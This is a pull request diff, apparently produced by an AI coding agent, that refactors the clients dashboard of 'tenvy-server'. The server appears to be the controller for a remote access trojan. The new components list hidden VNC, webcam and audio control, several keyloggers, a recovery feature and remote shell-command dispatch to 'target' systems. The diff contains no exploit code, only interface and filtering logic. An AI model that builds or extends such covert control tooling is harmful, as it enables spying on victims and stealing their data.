### PR TITLE
Refactor clients dashboard data flow and dialogs

### DIFF
--- a/tenvy-server/src/lib/client-sections.ts
+++ b/tenvy-server/src/lib/client-sections.ts
@@ -1,0 +1,36 @@
+import type { ClientToolId } from '$lib/data/client-tools';
+
+export const sectionToolMap = {
+	systemInfo: 'system-info',
+	notes: 'notes',
+	hiddenVnc: 'hidden-vnc',
+	remoteDesktop: 'remote-desktop',
+	webcamControl: 'webcam-control',
+	audioControl: 'audio-control',
+	keyloggerOnline: 'keylogger-online',
+	keyloggerOffline: 'keylogger-offline',
+	keyloggerAdvanced: 'keylogger-advanced-online',
+	cmd: 'cmd',
+	fileManager: 'file-manager',
+	taskManager: 'task-manager',
+	registryManager: 'registry-manager',
+	startupManager: 'startup-manager',
+	clipboardManager: 'clipboard-manager',
+	tcpConnections: 'tcp-connections',
+	recovery: 'recovery',
+	options: 'options',
+	openUrl: 'open-url',
+	messageBox: 'message-box',
+	clientChat: 'client-chat',
+	reportWindow: 'report-window',
+	ipGeolocation: 'ip-geolocation',
+	environmentVariables: 'environment-variables',
+	reconnect: 'reconnect',
+	disconnect: 'disconnect',
+	shutdown: 'shutdown',
+	restart: 'restart',
+	sleep: 'sleep',
+	logoff: 'logoff'
+} as const satisfies Record<string, ClientToolId>;
+
+export type SectionKey = keyof typeof sectionToolMap;

--- a/tenvy-server/src/lib/components/clients/clients-table-row.svelte
+++ b/tenvy-server/src/lib/components/clients/clients-table-row.svelte
@@ -1,0 +1,187 @@
+<script lang="ts">
+	import {
+		ContextMenu,
+		ContextMenuContent,
+		ContextMenuItem,
+		ContextMenuSeparator,
+		ContextMenuSub,
+		ContextMenuSubContent,
+		ContextMenuSubTrigger,
+		ContextMenuTrigger
+	} from '$lib/components/ui/context-menu/index.js';
+	import { TableCell, TableRow } from '$lib/components/ui/table/index.js';
+	import OsLogo from '$lib/components/os-logo.svelte';
+	import type { AgentSnapshot } from '../../../../../shared/types/agent';
+	import type { SectionKey } from '$lib/client-sections';
+
+	export let agent: AgentSnapshot;
+	export let openSection: (section: SectionKey, agent: AgentSnapshot) => void;
+	export let copyAgentId: (agentId: string) => void;
+	export let getAgentLocation: (agent: AgentSnapshot) => { label: string; flag: string };
+	export let getAgentGroup: (agent: AgentSnapshot) => string;
+	export let formatPing: (agent: AgentSnapshot) => string;
+	export let formatDate: (value: string) => string;
+</script>
+
+<ContextMenu>
+	<ContextMenuTrigger>
+		<TableRow class="cursor-context-menu" tabindex={0}>
+			<TableCell>
+				<div class="flex items-center gap-3">
+					<span class="text-2xl" aria-hidden="true">{getAgentLocation(agent).flag}</span>
+					<div class="flex flex-col">
+						<span class="text-sm font-medium text-foreground">{getAgentLocation(agent).label}</span>
+						{#if agent.metadata.hostname}
+							<span class="text-xs text-muted-foreground">{agent.metadata.hostname}</span>
+						{/if}
+					</div>
+				</div>
+			</TableCell>
+			<TableCell class="text-sm text-muted-foreground">
+				{agent.metadata.ipAddress ?? 'Unknown'}
+			</TableCell>
+			<TableCell class="text-sm text-muted-foreground">
+				{agent.metadata.username}
+			</TableCell>
+			<TableCell class="text-sm text-muted-foreground">
+				{getAgentGroup(agent)}
+			</TableCell>
+			<TableCell class="text-center">
+				<OsLogo os={agent.metadata.os} />
+			</TableCell>
+			<TableCell class="text-sm text-muted-foreground">
+				{formatPing(agent)}
+			</TableCell>
+			<TableCell class="text-sm text-muted-foreground">
+				{agent.metadata.version ?? '—'}
+			</TableCell>
+			<TableCell class="text-sm text-muted-foreground">
+				{formatDate(agent.connectedAt)}
+			</TableCell>
+		</TableRow>
+	</ContextMenuTrigger>
+	<ContextMenuContent class="w-56">
+		<ContextMenuItem onSelect={() => openSection('systemInfo', agent)}>System Info</ContextMenuItem>
+		<ContextMenuItem onSelect={() => openSection('notes', agent)}>Notes</ContextMenuItem>
+
+		<ContextMenuSeparator />
+
+		<ContextMenuSub>
+			<ContextMenuSubTrigger>Control</ContextMenuSubTrigger>
+			<ContextMenuSubContent class="w-48">
+				<ContextMenuItem onSelect={() => openSection('hiddenVnc', agent)}>
+					Hidden VNC
+				</ContextMenuItem>
+				<ContextMenuItem onSelect={() => openSection('remoteDesktop', agent)}>
+					Remote Desktop
+				</ContextMenuItem>
+				<ContextMenuItem onSelect={() => openSection('webcamControl', agent)}>
+					Webcam Control
+				</ContextMenuItem>
+				<ContextMenuItem onSelect={() => openSection('audioControl', agent)}>
+					Audio Control
+				</ContextMenuItem>
+				<ContextMenuSub>
+					<ContextMenuSubTrigger>Keylogger</ContextMenuSubTrigger>
+					<ContextMenuSubContent class="w-48">
+						<ContextMenuItem onSelect={() => openSection('keyloggerOnline', agent)}>
+							Online
+						</ContextMenuItem>
+						<ContextMenuItem onSelect={() => openSection('keyloggerOffline', agent)}>
+							Offline
+						</ContextMenuItem>
+						<ContextMenuItem onSelect={() => openSection('keyloggerAdvanced', agent)}>
+							Advanced Online
+						</ContextMenuItem>
+					</ContextMenuSubContent>
+				</ContextMenuSub>
+				<ContextMenuItem onSelect={() => openSection('cmd', agent)}>CMD</ContextMenuItem>
+			</ContextMenuSubContent>
+		</ContextMenuSub>
+
+		<ContextMenuSeparator />
+
+		<ContextMenuSub>
+			<ContextMenuSubTrigger>Management</ContextMenuSubTrigger>
+			<ContextMenuSubContent class="w-48">
+				<ContextMenuItem onSelect={() => openSection('fileManager', agent)}>
+					File Manager
+				</ContextMenuItem>
+				<ContextMenuItem onSelect={() => openSection('taskManager', agent)}>
+					Task Manager
+				</ContextMenuItem>
+				<ContextMenuItem onSelect={() => openSection('registryManager', agent)}>
+					Registry Manager
+				</ContextMenuItem>
+				<ContextMenuItem onSelect={() => openSection('startupManager', agent)}>
+					Startup Manager
+				</ContextMenuItem>
+				<ContextMenuItem onSelect={() => openSection('clipboardManager', agent)}>
+					Clipboard Manager
+				</ContextMenuItem>
+				<ContextMenuItem onSelect={() => openSection('tcpConnections', agent)}>
+					TCP Connections
+				</ContextMenuItem>
+			</ContextMenuSubContent>
+		</ContextMenuSub>
+
+		<ContextMenuSeparator />
+
+		<ContextMenuItem onSelect={() => openSection('recovery', agent)}>Recovery</ContextMenuItem>
+		<ContextMenuItem onSelect={() => openSection('options', agent)}>Options</ContextMenuItem>
+
+		<ContextMenuSeparator />
+
+		<ContextMenuSub>
+			<ContextMenuSubTrigger>Miscellaneous</ContextMenuSubTrigger>
+			<ContextMenuSubContent class="w-48">
+				<ContextMenuItem onSelect={() => openSection('openUrl', agent)}>Open URL</ContextMenuItem>
+				<ContextMenuItem onSelect={() => openSection('messageBox', agent)}>
+					Message Box
+				</ContextMenuItem>
+				<ContextMenuItem onSelect={() => openSection('clientChat', agent)}>
+					Client Chat
+				</ContextMenuItem>
+				<ContextMenuItem onSelect={() => openSection('reportWindow', agent)}>
+					Report Window
+				</ContextMenuItem>
+				<ContextMenuItem onSelect={() => openSection('ipGeolocation', agent)}>
+					IP Geolocation
+				</ContextMenuItem>
+				<ContextMenuItem onSelect={() => openSection('environmentVariables', agent)}>
+					Environment Variables
+				</ContextMenuItem>
+			</ContextMenuSubContent>
+		</ContextMenuSub>
+
+		<ContextMenuSeparator />
+
+		<ContextMenuSub>
+			<ContextMenuSubTrigger>System Controls</ContextMenuSubTrigger>
+			<ContextMenuSubContent class="w-48">
+				<ContextMenuItem onSelect={() => openSection('reconnect', agent)}>
+					Reconnect
+				</ContextMenuItem>
+				<ContextMenuItem onSelect={() => openSection('disconnect', agent)}>
+					Disconnect
+				</ContextMenuItem>
+			</ContextMenuSubContent>
+		</ContextMenuSub>
+
+		<ContextMenuSeparator />
+
+		<ContextMenuSub>
+			<ContextMenuSubTrigger>Power</ContextMenuSubTrigger>
+			<ContextMenuSubContent class="w-48">
+				<ContextMenuItem onSelect={() => openSection('shutdown', agent)}>Shutdown</ContextMenuItem>
+				<ContextMenuItem onSelect={() => openSection('restart', agent)}>Restart</ContextMenuItem>
+				<ContextMenuItem onSelect={() => openSection('sleep', agent)}>Sleep</ContextMenuItem>
+				<ContextMenuItem onSelect={() => openSection('logoff', agent)}>Logoff</ContextMenuItem>
+			</ContextMenuSubContent>
+		</ContextMenuSub>
+
+		<ContextMenuSeparator />
+
+		<ContextMenuItem onSelect={() => copyAgentId(agent.id)}>Copy agent ID</ContextMenuItem>
+	</ContextMenuContent>
+</ContextMenu>

--- a/tenvy-server/src/lib/components/clients/deploy-agent-dialog.svelte
+++ b/tenvy-server/src/lib/components/clients/deploy-agent-dialog.svelte
@@ -1,0 +1,39 @@
+<script lang="ts">
+	import {
+		Dialog as DialogRoot,
+		DialogContent,
+		DialogDescription,
+		DialogFooter,
+		DialogHeader,
+		DialogTitle
+	} from '$lib/components/ui/dialog/index.js';
+	import { Button } from '$lib/components/ui/button/index.js';
+	import { createEventDispatcher } from 'svelte';
+
+	export let open: boolean;
+
+	const dispatch = createEventDispatcher<{ close: void }>();
+
+	function handleClose() {
+		dispatch('close');
+	}
+</script>
+
+<DialogRoot {open} onOpenChange={(value: boolean) => (!value ? handleClose() : null)}>
+	<DialogContent class="sm:max-w-md">
+		<DialogHeader>
+			<DialogTitle>Connect an agent</DialogTitle>
+			<DialogDescription>
+				Generate a deployment command, execute it on the target system, and the agent will appear in
+				this list once it connects.
+			</DialogDescription>
+		</DialogHeader>
+		<div class="space-y-3 text-sm text-muted-foreground">
+			<p>Install the client binary, provide the controller URL, and confirm network access.</p>
+			<p>Agents automatically authenticate and begin reporting metrics immediately after launch.</p>
+		</div>
+		<DialogFooter>
+			<Button type="button" variant="ghost" onclick={handleClose}>Close</Button>
+		</DialogFooter>
+	</DialogContent>
+</DialogRoot>

--- a/tenvy-server/src/lib/components/clients/ping-agent-dialog.svelte
+++ b/tenvy-server/src/lib/components/clients/ping-agent-dialog.svelte
@@ -1,0 +1,77 @@
+<script lang="ts">
+	import { Button } from '$lib/components/ui/button/index.js';
+	import { Alert, AlertDescription, AlertTitle } from '$lib/components/ui/alert/index.js';
+	import {
+		Dialog as DialogRoot,
+		DialogContent,
+		DialogDescription,
+		DialogFooter,
+		DialogHeader,
+		DialogTitle
+	} from '$lib/components/ui/dialog/index.js';
+	import { Input } from '$lib/components/ui/input/index.js';
+	import { Label } from '$lib/components/ui/label/index.js';
+	import AlertCircle from '@lucide/svelte/icons/alert-circle';
+	import CheckCircle2 from '@lucide/svelte/icons/check-circle-2';
+	import { createEventDispatcher } from 'svelte';
+	import type { AgentSnapshot } from '../../../../../shared/types/agent';
+
+	export type PingDialogEvents = {
+		close: void;
+		submit: void;
+		messageChange: string;
+	};
+
+	export let agent: AgentSnapshot;
+	export let message: string;
+	export let error: string | null = null;
+	export let success: string | null = null;
+	export let pending = false;
+
+	const dispatch = createEventDispatcher<PingDialogEvents>();
+</script>
+
+<DialogRoot open onOpenChange={(value: boolean) => (!value ? dispatch('close') : null)}>
+	<DialogContent class="sm:max-w-md">
+		<DialogHeader>
+			<DialogTitle>Send ping</DialogTitle>
+			<DialogDescription
+				>Queue a keep-alive message for {agent.metadata.hostname}.</DialogDescription
+			>
+		</DialogHeader>
+		<div class="space-y-4">
+			<div class="space-y-2">
+				<Label for="ping-message" class="text-sm font-medium">Message</Label>
+				<Input
+					id="ping-message"
+					placeholder="Optional message"
+					value={message}
+					oninput={(event) => dispatch('messageChange', event.currentTarget.value)}
+				/>
+			</div>
+			{#if error}
+				<Alert variant="destructive">
+					<AlertCircle class="h-4 w-4" />
+					<AlertTitle>Ping failed</AlertTitle>
+					<AlertDescription>{error}</AlertDescription>
+				</Alert>
+			{:else if success}
+				<Alert class="border-emerald-500/40 bg-emerald-500/10 text-emerald-500">
+					<CheckCircle2 class="h-4 w-4" />
+					<AlertTitle>Ping queued</AlertTitle>
+					<AlertDescription>{success}</AlertDescription>
+				</Alert>
+			{/if}
+		</div>
+		<DialogFooter class="gap-2 sm:justify-between">
+			<Button type="button" variant="ghost" onclick={() => dispatch('close')}>Cancel</Button>
+			<Button type="button" onclick={() => dispatch('submit')} disabled={pending}>
+				{#if pending}
+					Sending…
+				{:else}
+					Queue ping
+				{/if}
+			</Button>
+		</DialogFooter>
+	</DialogContent>
+</DialogRoot>

--- a/tenvy-server/src/lib/components/clients/shell-command-dialog.svelte
+++ b/tenvy-server/src/lib/components/clients/shell-command-dialog.svelte
@@ -1,0 +1,102 @@
+<script lang="ts">
+	import { Button } from '$lib/components/ui/button/index.js';
+	import { Alert, AlertDescription, AlertTitle } from '$lib/components/ui/alert/index.js';
+	import {
+		Dialog as DialogRoot,
+		DialogContent,
+		DialogDescription,
+		DialogFooter,
+		DialogHeader,
+		DialogTitle
+	} from '$lib/components/ui/dialog/index.js';
+	import { Input } from '$lib/components/ui/input/index.js';
+	import { Label } from '$lib/components/ui/label/index.js';
+	import AlertCircle from '@lucide/svelte/icons/alert-circle';
+	import CheckCircle2 from '@lucide/svelte/icons/check-circle-2';
+	import { createEventDispatcher } from 'svelte';
+	import type { AgentSnapshot } from '../../../../../shared/types/agent';
+
+	export type ShellDialogEvents = {
+		close: void;
+		submit: void;
+		commandChange: string;
+		timeoutChange: number | undefined;
+	};
+
+	export let agent: AgentSnapshot;
+	export let command: string;
+	export let timeout: number | undefined;
+	export let error: string | null = null;
+	export let success: string | null = null;
+	export let pending = false;
+
+	const dispatch = createEventDispatcher<ShellDialogEvents>();
+</script>
+
+<DialogRoot open onOpenChange={(value: boolean) => (!value ? dispatch('close') : null)}>
+	<DialogContent class="sm:max-w-lg">
+		<DialogHeader>
+			<DialogTitle>Run shell command</DialogTitle>
+			<DialogDescription
+				>Dispatch a command for {agent.metadata.hostname} to execute.</DialogDescription
+			>
+		</DialogHeader>
+		<div class="space-y-4">
+			<div class="space-y-2">
+				<Label for="shell-command" class="text-sm font-medium">Command</Label>
+				<textarea
+					id="shell-command"
+					class="min-h-28 w-full rounded-md border border-border/60 bg-background px-3 py-2 text-sm focus:ring-2 focus:ring-primary focus:outline-none"
+					rows={4}
+					placeholder="whoami"
+					value={command}
+					oninput={(event) => dispatch('commandChange', event.currentTarget.value)}
+				></textarea>
+			</div>
+			<div class="grid gap-2 sm:grid-cols-[minmax(0,1fr)_auto] sm:items-center">
+				<div class="space-y-2">
+					<Label for="shell-timeout" class="text-sm font-medium">Timeout (seconds)</Label>
+					<Input
+						id="shell-timeout"
+						type="number"
+						min={1}
+						placeholder="Optional timeout"
+						value={timeout ?? ''}
+						oninput={(event) => {
+							const raw = event.currentTarget.value;
+							const value = Number.parseInt(raw, 10);
+							dispatch(
+								'timeoutChange',
+								raw.trim() === '' || Number.isNaN(value) ? undefined : value
+							);
+						}}
+					/>
+				</div>
+				<p class="text-xs text-muted-foreground">Leave blank to use the agent default.</p>
+			</div>
+			{#if error}
+				<Alert variant="destructive">
+					<AlertCircle class="h-4 w-4" />
+					<AlertTitle>Shell dispatch failed</AlertTitle>
+					<AlertDescription>{error}</AlertDescription>
+				</Alert>
+			{:else if success}
+				<Alert class="border-emerald-500/40 bg-emerald-500/10 text-emerald-500">
+					<CheckCircle2 class="h-4 w-4" />
+					<AlertTitle>Shell command queued</AlertTitle>
+					<AlertDescription>{success}</AlertDescription>
+				</Alert>
+			{/if}
+		</div>
+		<DialogFooter class="gap-2 sm:justify-between">
+			<Button type="button" variant="ghost" onclick={() => dispatch('close')}>Cancel</Button>
+			<Button type="button" onclick={() => dispatch('submit')} disabled={pending}>
+				{#if pending}
+					Dispatching…
+				{:else}
+					Queue command
+				{/if}
+			</Button>
+		</DialogFooter>
+	</DialogContent>
+</DialogRoot>

--- a/tenvy-server/src/lib/stores/clients-table.ts
+++ b/tenvy-server/src/lib/stores/clients-table.ts
@@ -1,0 +1,226 @@
+import { derived, get, writable } from 'svelte/store';
+import type { AgentSnapshot } from '../../../../../shared/types/agent';
+
+export type StatusFilter = 'all' | AgentSnapshot['status'];
+export type TagFilter = 'all' | string;
+
+export type PageRange = { start: number; end: number };
+
+export type ClientsTableState = {
+	agents: AgentSnapshot[];
+	searchQuery: string;
+	statusFilter: StatusFilter;
+	tagFilter: TagFilter;
+	perPage: number;
+	currentPage: number;
+	availableTags: string[];
+	filteredAgents: AgentSnapshot[];
+	paginatedAgents: AgentSnapshot[];
+	pageRange: PageRange;
+	totalPages: number;
+	paginationItems: (number | 'ellipsis')[];
+};
+
+function sanitizeQuery(query: string): string {
+	return query.trim().toLowerCase();
+}
+
+function matchesStatus(agent: AgentSnapshot, filter: StatusFilter): boolean {
+	return filter === 'all' || agent.status === filter;
+}
+
+function matchesTag(agent: AgentSnapshot, filter: TagFilter): boolean {
+	if (filter === 'all') {
+		return true;
+	}
+
+	return agent.metadata.tags?.some((tag) => tag.toLowerCase() === filter.toLowerCase()) ?? false;
+}
+
+function matchesQuery(agent: AgentSnapshot, query: string): boolean {
+	if (!query) {
+		return true;
+	}
+
+	const haystack = [
+		agent.id,
+		agent.metadata.hostname,
+		agent.metadata.username,
+		agent.metadata.os,
+		agent.metadata.ipAddress,
+		...(agent.metadata.tags ?? [])
+	]
+		.filter(Boolean)
+		.map((value) => value!.toString().toLowerCase());
+
+	return haystack.some((value) => value.includes(query));
+}
+
+export function filterAgents(
+	agents: AgentSnapshot[],
+	query: string,
+	statusFilter: StatusFilter,
+	tagFilter: TagFilter
+): AgentSnapshot[] {
+	const normalizedQuery = sanitizeQuery(query);
+	return agents.filter(
+		(agent) =>
+			matchesStatus(agent, statusFilter) &&
+			matchesTag(agent, tagFilter) &&
+			matchesQuery(agent, normalizedQuery)
+	);
+}
+
+function paginateAgents(
+	agents: AgentSnapshot[],
+	currentPage: number,
+	perPage: number
+): { items: AgentSnapshot[]; startIndex: number } {
+	const safePerPage = Math.max(1, perPage);
+	const safePage = Math.max(1, currentPage);
+	const startIndex = (safePage - 1) * safePerPage;
+	const slice = agents.slice(startIndex, startIndex + safePerPage);
+	return { items: slice, startIndex };
+}
+
+function computeAvailableTags(agents: AgentSnapshot[]): string[] {
+	const tags = new Set<string>();
+	for (const agent of agents) {
+		for (const tag of agent.metadata.tags ?? []) {
+			tags.add(tag);
+		}
+	}
+	return Array.from(tags).sort((a, b) => a.localeCompare(b));
+}
+
+function computePageRange(length: number, sliceLength: number, startIndex: number): PageRange {
+	if (length === 0 || sliceLength === 0) {
+		return { start: 0, end: 0 };
+	}
+
+	const start = startIndex + 1;
+	const end = Math.min(startIndex + sliceLength, length);
+	return { start, end };
+}
+
+export function buildPaginationItems(
+	total: number,
+	current: number,
+	siblingCount = 1
+): (number | 'ellipsis')[] {
+	if (total <= 1) {
+		return [1];
+	}
+
+	const safeCurrent = Math.min(Math.max(current, 1), total);
+	const start = Math.max(2, safeCurrent - siblingCount);
+	const end = Math.min(total - 1, safeCurrent + siblingCount);
+
+	const items: (number | 'ellipsis')[] = [1];
+
+	if (start > 2) {
+		items.push('ellipsis');
+	}
+
+	for (let page = start; page <= end; page += 1) {
+		items.push(page);
+	}
+
+	if (end < total - 1) {
+		items.push('ellipsis');
+	}
+
+	items.push(total);
+
+	return items;
+}
+
+export type ClientsTableStore = ReturnType<typeof createClientsTableStore>;
+
+export function createClientsTableStore(initialAgents: AgentSnapshot[]): {
+	subscribe: (
+		run: (value: ClientsTableState) => void,
+		invalidate?: (value?: ClientsTableState) => void
+	) => () => void;
+	setAgents: (agents: AgentSnapshot[]) => void;
+	setSearchQuery: (value: string) => void;
+	setStatusFilter: (value: StatusFilter) => void;
+	setTagFilter: (value: TagFilter) => void;
+	setPerPage: (value: number) => void;
+	goToPage: (page: number) => void;
+	nextPage: () => void;
+	previousPage: () => void;
+} {
+	const agents = writable(initialAgents ?? []);
+	const searchQuery = writable('');
+	const statusFilter = writable<StatusFilter>('all');
+	const tagFilter = writable<TagFilter>('all');
+	const perPage = writable(10);
+	const currentPage = writable(1);
+
+	derived([searchQuery, statusFilter, tagFilter, perPage], () => {
+		currentPage.set(1);
+	}).subscribe(() => {
+		// no-op subscription to keep the derived store active
+	});
+
+	const state = derived(
+		[agents, searchQuery, statusFilter, tagFilter, perPage, currentPage],
+		([$agents, $searchQuery, $statusFilter, $tagFilter, $perPage, $currentPage]) => {
+			const availableTags = computeAvailableTags($agents);
+			const filteredAgents = filterAgents($agents, $searchQuery, $statusFilter, $tagFilter);
+
+			const totalPages =
+				filteredAgents.length === 0
+					? 1
+					: Math.max(1, Math.ceil(filteredAgents.length / Math.max(1, $perPage)));
+
+			const safeCurrentPage = Math.min(Math.max($currentPage, 1), totalPages);
+			if (safeCurrentPage !== $currentPage) {
+				currentPage.set(safeCurrentPage);
+			}
+
+			const { items: paginatedAgents, startIndex } = paginateAgents(
+				filteredAgents,
+				safeCurrentPage,
+				Math.max(1, $perPage)
+			);
+
+			const pageRange = computePageRange(filteredAgents.length, paginatedAgents.length, startIndex);
+			const paginationItems = buildPaginationItems(totalPages, safeCurrentPage);
+
+			return {
+				agents: $agents,
+				searchQuery: $searchQuery,
+				statusFilter: $statusFilter,
+				tagFilter: $tagFilter,
+				perPage: Math.max(1, $perPage),
+				currentPage: safeCurrentPage,
+				availableTags,
+				filteredAgents,
+				paginatedAgents,
+				pageRange,
+				totalPages,
+				paginationItems
+			} satisfies ClientsTableState;
+		}
+	);
+
+	return {
+		subscribe: state.subscribe,
+		setAgents: (nextAgents) => agents.set(nextAgents ?? []),
+		setSearchQuery: (value) => searchQuery.set(value),
+		setStatusFilter: (value) => statusFilter.set(value),
+		setTagFilter: (value) => tagFilter.set(value),
+		setPerPage: (value) => perPage.set(Math.max(1, value)),
+		goToPage: (page) => currentPage.set(Math.max(1, Math.trunc(page))),
+		nextPage: () => {
+			const { currentPage: page, totalPages } = get(state);
+			currentPage.set(Math.min(totalPages, page + 1));
+		},
+		previousPage: () => {
+			const { currentPage: page } = get(state);
+			currentPage.set(Math.max(1, page - 1));
+		}
+	};
+}


### PR DESCRIPTION
## Summary
- move client filtering, search, and pagination logic into a dedicated clients-table store
- extract the long clients table row and related dialogs into reusable client components
- update the clients dashboard page to consume the new store and components while keeping existing interactions intact

## Testing
- bun format

------
https://chatgpt.com/codex/tasks/task_e_68e90d6bd0b8832b9a3077268bfb9deb